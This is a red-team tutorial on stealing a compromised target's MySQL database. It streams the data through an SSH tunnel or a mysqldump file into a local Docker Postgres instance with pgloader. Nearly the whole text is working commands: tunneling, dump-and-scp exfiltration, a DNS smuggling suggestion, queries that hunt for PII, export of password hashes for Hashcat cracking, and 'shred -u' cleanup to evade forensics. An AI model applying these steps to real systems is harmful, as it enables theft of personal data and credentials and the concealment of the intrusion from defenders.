Introduction
For a seasoned red teamer, gaining shell access is often just the beginning. The real value—the “crown jewels”—usually lives in the database. You might find customer data, intellectual property, or plain-text credentials that unlock the rest of the network.
Often, you land on a target running MySQL. While you can query it in place, this is risky. Long-running analytical queries can spike CPU usage, alert defenders, or even lock production tables, causing a Denial of Service.
The Solution: Exfiltrate the data to a local environment where you can analyze it safely and aggressively.
In this guide, we will use Docker to spin up a sacrificial PostgreSQL instance and pgloader to automagically convert the target’s MySQL schema and data into Postgres format.
Why Postgres? Because it offers superior analytical capabilities (regex, full-text search) and integrates better with many offline analysis tools than MySQL. Plus, pgloader handles the dirty work of type conversion for us.
Part 1: The Red Team Infrastructure
Before we move data, we need a stable container to hold it. We use Docker to keep our host OS clean.
1. Spinning up PostgreSQL via Docker
We must mount a volume so that the data persists even if the container crashes.
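A minimal sketch, reusing the `postgres-exfil` container name and `~/loot/postgres_data` path referenced later in this guide; the password and database name (`loot`, `target_db`) are placeholders:

```bash
# Create a local loot directory so the database survives container restarts
mkdir -p ~/loot/postgres_data

# Run a disposable Postgres container, with data persisted to the host
docker run -d \
  --name postgres-exfil \
  -e POSTGRES_PASSWORD=loot \
  -e POSTGRES_DB=target_db \
  -p 5432:5432 \
  -v ~/loot/postgres_data:/var/lib/postgresql/data \
  postgres:16
```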
2. Preparing the Tunnel (For Live Migration)
If you have a live connection to the target network, you need to expose the internal MySQL port (3306) to your localhost.
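One common way is a local SSH port forward through the pivot host; `user@pivot-host` is a placeholder for whatever access you already have:

```bash
# Forward localhost:3306 on the attack box to MySQL on the pivot host
ssh -f -N -L 3306:127.0.0.1:3306 user@pivot-host
```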
Note: We assume the MySQL server is listening on localhost of the pivot host. If it’s a different server, adjust the jump.
Part 2: The “Live” Migration (Networked)
If you have a high-bandwidth, stable connection, pgloader can stream data directly from the target to your local Docker container. This is the fastest method.
1. Installing pgloader
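On a Debian-based attack box the distro package is usually enough; alternatively, pulling the maintainer's `dimitri/pgloader` image keeps your host clean:

```bash
# Debian/Ubuntu
sudo apt-get update && sudo apt-get install -y pgloader

# Or use the Docker image instead of installing locally
docker pull dimitri/pgloader
```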
2. The Migration Command
pgloader handles schema translation (e.g., converting MySQL INT(11) to Postgres integer).
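A minimal sketch, assuming the tunnel from Part 1 is up on localhost:3306 and the Postgres credentials from the Docker example above; the MySQL credentials are placeholders:

```bash
# Source: the target's MySQL, reached through the local SSH tunnel
# Destination: the sacrificial Postgres container
pgloader \
  mysql://dbuser:dbpass@127.0.0.1:3306/target_db \
  postgresql://postgres:loot@127.0.0.1:5432/target_db
```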
Under the Hood:
- Connects to MySQL (Target) via the SSH tunnel.
- Connects to Postgres (Local) via Docker.
- Reads schema, converts types, creates tables.
- Batches and streams data.
> [!NOTE]
> If you encounter SSL errors connecting to older MySQL servers, add `?useSSL=false` to the source connection string.
Part 3: The “Offline” Migration (Air-Gapped / Restricted)
Sometimes, you cannot open a direct tunnel. The network might be unstable, or strict egress filtering blocks your connection. In this case, you must dump the data to a file, exfiltrate the file, and load it locally.
Step 1: Dump on Target
Use mysqldump to create a standard SQL backup.
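Something like the following, run on the target or pivot host; the credentials and database name are placeholders, and `--single-transaction` keeps the dump consistent without locking InnoDB tables:

```bash
# On the target / pivot host
mysqldump -u dbuser -p \
  --single-transaction \
  --compatible=postgresql \
  target_db > dump.sql

# Compress before moving it
gzip dump.sql
```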
- `--compatible=postgresql`: Helps (but doesn’t perfectly fix) dialect issues. Note that mysqldump in MySQL 8.0 only accepts `--compatible=ansi`, so drop or adjust this flag on newer targets.
Step 2: Exfiltrate
Use `scp` or `rsync`, or, if you are desperate, split the file into base64 chunks and smuggle it out over DNS.
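For example, pulling the compressed dump back over the same SSH access (paths are placeholders):

```bash
# Pull the compressed dump back to the analysis box
scp user@pivot-host:/tmp/dump.sql.gz ~/loot/
```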
Step 3: Load with pgloader
pgloader does not parse raw mysqldump output, so the cleanest offline route is to restore the dump into a throwaway local MySQL container and then run pgloader against that local copy, exactly as in the live migration.
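A rough sketch of that round trip, assuming the Dockerized Postgres from Part 1 is still running; the `mysql-staging` container name and credentials are placeholders:

```bash
# Throwaway local MySQL to receive the dump
docker run -d --name mysql-staging \
  -e MYSQL_ROOT_PASSWORD=staging \
  -e MYSQL_DATABASE=target_db \
  -p 3306:3306 \
  mysql:8

# Restore the exfiltrated dump into it
# (give MySQL a few seconds to finish initializing first)
gunzip -c ~/loot/dump.sql.gz | docker exec -i mysql-staging mysql -uroot -pstaging target_db

# Migrate from the local MySQL into Postgres, exactly as in Part 2
pgloader \
  mysql://root:staging@127.0.0.1:3306/target_db \
  postgresql://postgres:loot@127.0.0.1:5432/target_db
```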
Part 4: Deep Analysis and Looting
Now that you have the data locally, you can run aggressive queries without fear of crashing production.
Finding PII (Personally Identifiable Information)
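A starting point is to hunt for likely PII columns by name across the whole schema; the name patterns below are just examples to extend:

```bash
# List columns whose names suggest PII, across every table in the public schema
docker exec -it postgres-exfil psql -U postgres -d target_db -c "
  SELECT table_name, column_name
  FROM information_schema.columns
  WHERE table_schema = 'public'
    AND (column_name ILIKE '%email%'
      OR column_name ILIKE '%ssn%'
      OR column_name ILIKE '%phone%'
      OR column_name ILIKE '%dob%');
"
```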
Extracting Hashes for Cracking
If the MySQL database stored application passwords, export them for Hashcat.
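A sketch assuming a hypothetical users table with username and password_hash columns; adjust the table, columns, Hashcat mode, and wordlist to the real schema and hash format:

```bash
# Export user:hash pairs in a Hashcat-friendly format
docker exec -i postgres-exfil psql -U postgres -d target_db -At -F: \
  -c "SELECT username, password_hash FROM users;" > hashes.txt

# Example: crack bcrypt hashes (mode 3200), ignoring the username prefix
hashcat -m 3200 --username hashes.txt rockyou.txt
```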
Cross-Referencing Data
You can now join tables that would be too expensive to join on a live system, hunting for patterns like user reuse of passwords or common email domains.
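For example, against the same hypothetical users table, a single query surfaces hashes shared by multiple accounts:

```bash
# Hypothetical example: find password hashes reused across accounts
docker exec -it postgres-exfil psql -U postgres -d target_db -c "
  SELECT password_hash,
         count(*)                AS accounts,
         string_agg(email, ', ') AS reused_by
  FROM users
  GROUP BY password_hash
  HAVING count(*) > 1
  ORDER BY accounts DESC;
"
```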
Part 5: OpSec and Forensic Considerations
- Network Spike: A “Live” migration creates a massive, sustained download stream. This looks like data exfiltration (because it is). Network flow logs will catch this.
- Disk I/O: The “Offline” method creates a large file on the target disk. Ensure you delete `dump.sql` and `dump.sql.gz` immediately after transfer. Use `shred -u` if possible.
- Process List: `mysqldump` and `ssh` processes are visible.
- Cleanup:
```bash
# Stop the local container when done analyzing
docker stop postgres-exfil
# The data persists in ~/loot/postgres_data if you need it later.
```
Conclusion
The combination of Docker and pgloader provides a high-speed, reliable pipeline for analyzing target data. Whether you stream it live through a tunnel or carry it out as a dump file, getting the data onto your own infrastructure allows you to work smarter, not harder.
Data is the ultimate payload. Treat it with respect.
Happy hunting!